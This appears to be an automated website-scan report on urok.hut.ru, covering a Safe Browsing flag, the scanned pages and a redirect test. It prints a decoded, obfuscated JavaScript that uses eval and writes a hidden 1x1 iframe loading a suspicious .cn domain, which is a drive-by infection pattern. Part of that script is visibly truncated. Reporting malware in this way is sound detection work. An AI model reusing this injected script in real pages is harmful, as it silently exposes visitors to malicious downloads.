Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=urok.hut.ru
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://urok.hut.ru/ | 200 OK Content-Length: 75257 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Decoded script:
function ikchbw(){nycf=Math.PI;ssy=parseInt;lywr='length';zufro=ssy(~((nycf&nycf)|(~nycf&nycf)&(nycf&~nycf)|(~nycf&~nycf)));fxrw=ssy(((zufro&zufro)|(~zufro&zufro)&(zufro&~zufro)|(~zufro&~zufro))&1);qibo=fxrw<<fxrw;tklttv=zufro;ssuwqn='';mmhnih=String.fromCharCode;osbj=eval;for(tihzh=zufro;tihzh<yotl[lywr];tihzh-=-fxrw)tklttv+=yotl.charCodeAt(tihzh);tklttv%=unescape(zufro+mmhnih(120)+(fxrw<<6));for(tihzh=zufro;tihzh<ln[lywr];tihzh return(0); }
ind1=1;
document.getElementById('myiframe').src="http://google.maniyakat.cn/";
}
document.write("<iframe width='1' height='1' style='visibility:hidden' id='myiframe' onLoad='try{doiframesrc();}catch(e){}'></iframe>");
if(document.all) { doiframesrc(); }
ssuwqn="NaN";tklttv="NaN";
<iframe width='1' height='1' style='visibility:hidden' id='myiframe' onLoad='try{doiframesrc();}catch(e){}'></iframe>
Antivirus reports:
http://tmserver-1.com/16hd27bpso0u20kps1l8164dabgo5lz6mkhi34l | 200 OK Content-Length: 17854 Content-Type: text/javascript | clean |
http://stat.tbn.ru/loader.js?u=64713 | 200 OK Content-Length: 5000 Content-Type: application/x-javascript | clean |
http://urok.hut.ru/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 08 Mar 2015 13:43:18 GMT Location: http://err.hut.ru/error404.shtml Server: nginx/0.6.29 Content-Type: text/html; charset=windows-1251 Expires: Thu, 01 Jan 1970 00:00:01 GMT | clean |
http://err.hut.ru/error404.shtml | 200 OK Content-Length: 6626 Content-Type: text/html | clean |
http://err.hut.ru/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 08 Mar 2015 13:43:19 GMT Location: http://err.hut.ru/error404.shtml Server: nginx/0.6.29 Content-Type: text/html; charset=windows-1251 Expires: Thu, 01 Jan 1970 00:00:01 GMT | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: urok.hut.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Mar 2015 13:43:18 GMT
Server: nginx/0.6.29
Content-Type: text/html; charset=windows-1251
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Second query (visit from search engine):
GET / HTTP/1.1
Host: urok.hut.ru
Referer: http://www.google.com/search?q=urok.hut.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.